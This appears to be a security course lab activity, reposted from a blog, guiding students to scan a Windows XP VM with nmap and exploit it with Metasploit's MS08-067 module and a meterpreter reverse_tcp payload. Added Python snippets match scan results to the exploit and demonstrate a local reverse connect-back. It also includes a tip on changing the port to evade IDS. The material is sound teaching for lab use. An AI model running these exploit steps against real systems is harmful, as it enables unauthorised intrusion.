Unit 4: Exploits and Exploiting 4.3 Activity and Discussion Activity: Using Metasploit

ACTIVITY: USING METASPLOIT

This activity is ungraded.

Remember: Watch this Demo video. Seeing me complete the activity first will help you understand each of the steps.

System: During this activity, you’ll use the Kali VM as you did in the packet sniffing exercises in Unit 1. 
Instructions for installing and launching the Kali VM.

Note:

  • To complete all of these activities as written, in sequence, you need to have, or acquire, your own copy of Windows XP.
  • Just the very last activity requires Windows 7. If you're using the free Microsoft Windows 7 VM (which is limited), some Meterpreter commands from the Meterpreter Activity and Demo Videos will not work. If you're using your own Windows 7 copy, you should be able to replicate everything I did in the demos.

Time: This activity should take you approximately 30 minutes to complete.

Goal
  • To use Metasploit to identify and configure an exploit and payload.
Instructions

Start Metasploit

Note: Hit Enter after each command.

  1. Start VMware, and launch your Kali VM.
  2. Open up a terminal and start the PostgreSQL database service: /etc/init.d/postgresql start (on current Kali releases, systemctl start postgresql does the same thing)
  3. Create and initialize the Metasploit Framework database with the command msfdb init
    Note: You’ll only enter this command the first time you go through these steps. Subsequently, use msfdb start to start the database before launching msfconsole.
  4. Launch a second terminal to run MSF in its own environment with the command msfconsole
  5. After a moment, you’ll see the msf > prompt. Enter db_status to confirm that msfconsole is connected to the database; without it, scan results and hosts are not saved between sessions.

Select an Exploit

  1. Open up Windows XP in your second hypervisor (VirtualBox or Hyper-V). The Windows XP system should be in bridged mode.

    Note: Your Windows host machine, your Kali VM, and your Windows XP VM should all be on the same subnet. Make sure they can all ping each other before going forward. If the three machines can’t ping each other, make sure the pings aren’t being blocked by a firewall.
  2. In msfconsole, enter nmap -A -v [IP of XP VM]. msfconsole passes commands it doesn’t recognise to the underlying shell, so this runs the system nmap. If you would rather have the results stored in the Metasploit database (where the hosts and services commands can read them back), enter db_nmap -A -v [IP of XP VM] instead.
    -A performs a battery of tests against the target IP address, including OS detection, version detection, script scanning, and traceroute.
    -v specifies that we want verbose output.

    Notice at the bottom of the output there are lines regarding SMB (Server Message Block) security on the XP system. SMB is the Windows file- and printer-sharing protocol. Also, port 445/tcp, for directly hosted SMB over TCP/IP (without the NetBIOS layer on 139), is open; that is the port the exploit below talks to.
  3. Let’s see all modules associated with SMB. Enter search smb.
  4. To find one of the most famous exploits of all time, enter search ms08_067_netapi.
  5. For more information on this exploit, enter info exploit/windows/smb/ms08_067_netapi.
  6. To select this exploit for use, enter use exploit/windows/smb/ms08_067_netapi.
  7. You’ll notice that the prompt changes to a module-specific prompt, from
    msf > use exploit/windows/smb/ms08_067_netapi
    to
    msf exploit(ms08_067_netapi) >
    (Newer versions of the framework show the module’s full path in the prompt, e.g. msf6 exploit(windows/smb/ms08_067_netapi) >.)
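The scan-to-module step above is done by eye in the activity. The following is an added example (not part of the course material or of Metasploit) that does the same triage over nmap’s machine-readable XML output (nmap -A -oX scan.xml <ip>): it lists live hosts with SMB reachable on 445/tcp or 139/tcp and suggests the module used on this page when the OS fingerprint or the SMB banner names a platform MS08-067 affects. The embedded XML is a constructed sample, not a real capture, and the two addresses in it are the ones used on this page.

```python
"""Triage an nmap XML scan for the SMB foothold this activity targets.

Added example, not course or framework code: parses `nmap -A -oX` output
(the page shows only nmap's normal output) and suggests the page's module
when a host looks like a fit.
"""
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output; not a real capture.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -A -v -oX scan.xml 192.168.1.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.1.105" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP2 or SP3" accuracy="98"/></os>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.1.104" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
    </ports>
    <os><osmatch name="Linux 5.X" accuracy="95"/></os>
  </host>
</nmaprun>
"""

# Platforms the MS08-067 bulletin covers and the module's targets are built around.
MS08_067_PLATFORMS = ("windows 2000", "windows xp", "windows 2003")
MS08_067_MODULE = "exploit/windows/smb/ms08_067_netapi"


def parse_hosts(xml_text):
    """Return one dict per live host: IPv4 address, open TCP ports, OS guess."""
    hosts = []
    for h in ET.fromstring(xml_text).findall("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = h.find("address[@addrtype='ipv4']")
        open_ports = {}
        for p in h.findall("ports/port"):
            if p.get("protocol") != "tcp" or p.find("state").get("state") != "open":
                continue
            svc = p.find("service")
            open_ports[int(p.get("portid"))] = (
                (svc.get("name", ""), svc.get("product", "")) if svc is not None else ("", "")
            )
        osm = h.find("os/osmatch")
        hosts.append({
            "addr": addr.get("addr") if addr is not None else "",
            "open": open_ports,
            "os": osm.get("name", "") if osm is not None else "",
        })
    return hosts


def smb_exposed(host):
    """True if SMB is reachable: 445/tcp (direct) or 139/tcp (over NetBIOS)."""
    return 445 in host["open"] or 139 in host["open"]


def suggest_module(host):
    """Name the page's module when SMB is open and the OS guess or SMB banner names an affected platform."""
    if not smb_exposed(host):
        return None
    fingerprint = " ".join([host["os"]] + [prod for _, prod in host["open"].values()]).lower()
    if any(plat in fingerprint for plat in MS08_067_PLATFORMS):
        return MS08_067_MODULE
    return None


def triage(xml_text):
    """Map each SMB-exposed host to a suggested module (None when nothing matches)."""
    return {h["addr"]: suggest_module(h) for h in parse_hosts(xml_text) if smb_exposed(h)}


if __name__ == "__main__":
    for addr, module in triage(SAMPLE_NMAP_XML).items():
        print(f"{addr}: {module or 'SMB open, no matching module'}")
```

A suggestion from this script is only a lead: run the module’s check command (or info) against the host before trusting it, since OS fingerprints are guesses and a patched XP host will still match here.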

Configure an Exploit and Payload

A reverse_tcp payload makes the victim machine, your Windows XP VM, initiate a TCP connection back to a handler listening on your Kali VM. Because the target opens the connection, this works even when the target’s firewall blocks inbound connections; the handler’s address and port are the LHOST and LPORT options you set below.

  1. Enter show payloads to see all available payloads.
  2. Enter search windows/meterpreter/reverse_tcp to find a reverse_tcp meterpreter shell.
  3. Enter info windows/meterpreter/reverse_tcp for more information on this payload.
  4. To select the payload, enter set payload windows/meterpreter/reverse_tcp.
  5. Enter show options to configure the exploit. Note the various parameters which are required for the exploit to be launched properly.
  6. Enter show targets to see all of the targets this exploit works for.
  7. For this activity, keep the default of target 0, automatic targeting.
  8. Set the remote host using the IP address of the Windows XP system: set RHOST 192.168.1.105 (remember to change this IP to yours; current versions of the framework name this option RHOSTS and accept RHOST as an alias).
  9. Set the local host, using the IP address of your Kali box on the shared subnet: set LHOST 192.168.1.104. This is the address the XP machine will connect back to, so it must be one the XP VM can reach.
  10. Enter show options to verify your settings.

Note: A hacker could change the local port from the default of 4444 (set LPORT [port]) to avoid detection, since many IDS signatures key on Metasploit’s default port 4444. You don’t have to do that for this activity; whatever you choose, the handler listens on LHOST:LPORT and the payload connects to exactly that pair.

Enter exploit to launch the attack against the XP system. (This module also supports check, which reports whether the target looks vulnerable without launching the exploit.) If successful, you’ll see your meterpreter > prompt!
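To make the LHOST/LPORT mechanics concrete, here is an added example (not Metasploit code and not from the course) of what a reverse_tcp payload and its handler do on the wire: the handler binds and listens, the "victim" dials out to it, and the attacker then sends commands over the connection the victim opened. Both ends run on 127.0.0.1 here and the port is chosen by the OS, so the addresses, the banner and the command are assumptions for the demonstration; the lport field in the result is the destination port an IDS would see, which is why changing it from 4444 matters.

```python
"""What a reverse_tcp payload actually does on the wire.

Added example, not framework code: a throwaway handler that listens on
LHOST:LPORT the way Metasploit's handler does, and a stand-in for the
payload that dials back from the "victim". Addresses are local assumptions.
"""
import socket
import threading

DEFAULT_LPORT = 4444  # the framework's default, and what generic IDS rules look for


def start_handler(lhost="127.0.0.1", lport=0):
    """Bind and listen like the handler; lport=0 lets the OS pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((lhost, lport))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def connect_back(lhost, lport, banner=b"victim: session up", timeout=5.0):
    """The payload's side: connect *out* to the attacker, then wait for a command."""
    with socket.create_connection((lhost, lport), timeout=timeout) as s:
        s.sendall(banner)
        return s.recv(1024)


def run_session(lhost="127.0.0.1", lport=0, command=b"whoami"):
    """Drive one exchange and report who connected to whom, and on which ports."""
    srv, port = start_handler(lhost, lport)
    victim_got = {}

    def victim():
        # Runs on the "target": it initiates the TCP connection, not the attacker.
        victim_got["reply"] = connect_back(lhost, port)

    t = threading.Thread(target=victim)
    t.start()
    try:
        conn, peer = srv.accept()          # blocks until the victim dials in
        with conn:
            banner = conn.recv(1024)
            conn.sendall(command)          # attacker -> victim, over the victim's connection
    finally:
        t.join()
        srv.close()
    return {
        "lport": port,                     # destination port seen by an IDS watching the victim
        "peer_port": peer[1],              # ephemeral source port the victim's OS chose
        "banner": banner,
        "victim_reply": victim_got["reply"],
        "matches_default_lport": port == DEFAULT_LPORT,
    }


if __name__ == "__main__":
    info = run_session()
    print(f"victim dialled in from port {info['peer_port']} to LPORT {info['lport']}")
    print(f"handler got {info['banner']!r}; victim received {info['victim_reply']!r}")
```

Run it as a script to see both ports; note that the victim side needs only an outbound connection allowed, which is the practical reason reverse payloads are preferred over bind payloads on firewalled targets.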

In the next activities, you will see what you can do on the target machine through this exploit. You should continue working now if you can. If not, you will have to repeat these steps before starting the next activity Meterpreter Commands.

Reposted from: https://www.cnblogs.com/sec875/articles/10028558.html
